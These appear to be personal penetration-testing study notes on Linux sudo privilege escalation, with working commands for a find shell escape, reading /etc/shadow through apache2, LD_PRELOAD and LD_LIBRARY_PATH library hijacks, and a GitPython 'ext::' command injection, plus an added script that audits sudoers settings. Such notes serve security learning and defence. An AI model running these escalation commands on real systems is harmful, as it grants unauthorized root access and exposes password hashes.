Run a program as a specific user
sudo -u username program
List programs a user is allowed to run
sudo -l
Shell escape sequences
Even if we are restricted to running certain programs via sudo, it is sometimes possible to “escape” the program and spawn a shell.
LSE
./lse.sh -i | more
Go to GTFOBins (gtfobins.github.io)
Example with find
sudo find . -exec /bin/sh \; -quit
Abusing Intended Functionality
Example with apache2
Apache doesn’t have any escape sequences, but when it is given a file it cannot parse as its configuration, the error it reports reveals the file’s contents, so we are able to read the file.
sudo apache2 -f /etc/shadow
Environment variables
Programs run through sudo can inherit the environment variables from the user’s environment.
In the /etc/sudoers config file, if the env_reset option is set, sudo will run programs in a new, minimal environment.
The env_keep option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running sudo -l
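To check a sudoers file itself for the settings that the LD_PRELOAD and LD_LIBRARY_PATH sections below depend on, here is an added audit script (not part of the original notes); the sample sudoers content at the bottom is constructed to show the weak configuration:

```shell
#!/bin/sh
# Added example: audit a sudoers file for env_reset being disabled and for
# env_keep passing LD_PRELOAD or LD_LIBRARY_PATH through to sudo targets.
# Only the given file is read (#include and sudoers.d are not followed),
# so run it against every sudoers file you manage.

# audit_sudoers FILE
#   Prints one line per weak setting; returns 1 if any was found, 0 if clean.
audit_sudoers() {
    file="$1"
    findings=0
    # Drop comments, keep Defaults lines (incl. Defaults:user / Defaults@host forms).
    defaults=$(sed -e 's/#.*//' "$file" | grep -E '^[[:space:]]*Defaults' || true)

    # "Defaults !env_reset" hands the caller's whole environment to the target.
    if printf '%s\n' "$defaults" | grep -qE '(^|[[:space:],])!env_reset([[:space:],]|$)'; then
        echo "env_reset is disabled: caller environment reaches sudo targets"
        findings=$((findings + 1))
    fi

    # env_keep = / env_keep += lists survive env_reset; "env_keep -=" removes, so skip it.
    for var in LD_PRELOAD LD_LIBRARY_PATH; do
        if printf '%s\n' "$defaults" | grep -E 'env_keep[[:space:]]*[+]?=' | grep -qw "$var"; then
            echo "env_keep passes $var to programs run via sudo"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample sudoers content reproducing the weak setting described above.
sample=$(mktemp)
cat > "$sample" <<'EOF'
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD"
jay ALL=(root) NOPASSWD: /usr/bin/find
EOF
audit_sudoers "$sample" || echo "sample sudoers has weak settings"
rm -f "$sample"
```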
LD_PRELOAD
It is an environment variable which can be set to the path of a shared object (.so) file.
When set, the shared object will be loaded before any others.
By creating a custom shared object with an init() function, we can execute code as soon as the object is loaded.
Exploit
- Check with sudo -l if env_keep+=LD_PRELOAD is set
- vim preload.c
- /home/jay/Documents/tool_for_oscp/Linux-PrivEsc-Tools/tools/sudo/preload.c
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
sudo LD_PRELOAD=/tmp/preload.so find
LD_LIBRARY_PATH
The LD_LIBRARY_PATH environment variable contains a set of directories where shared libraries are searched for first.
The ldd command can be used to print the shared libraries used by a program:
ldd /usr/sbin/apache2
By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.
Exploit
- Check with sudo -l if env_keep+=LD_LIBRARY_PATH is set
- Run the ldd command against the program in the list
- /home/jay/Documents/tool_for_oscp/Linux-PrivEsc-Tools/tools/sudo/library_path.c
sed -i 's/\xC2\xA0/ /g' library_path.c
gcc -o libcrypt.so.1 -shared -fPIC library_path.c (choose the library name from the output of the ldd command)
sudo LD_LIBRARY_PATH=. apache2
GitPython
pip show gitpython
Name: GitPython
Version: 3.1.29
Summary: GitPython is a python library used to interact with Git repositories
#!/usr/bin/python3
import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]  # first argument is passed through unchecked
r = Repo.init('', bare=True)
# protocol.ext.allow=always enables the ext:: transport, so the URL can carry a command
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
Found using the GitPython vulnerability and ChatGPT
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c /tmp/bad"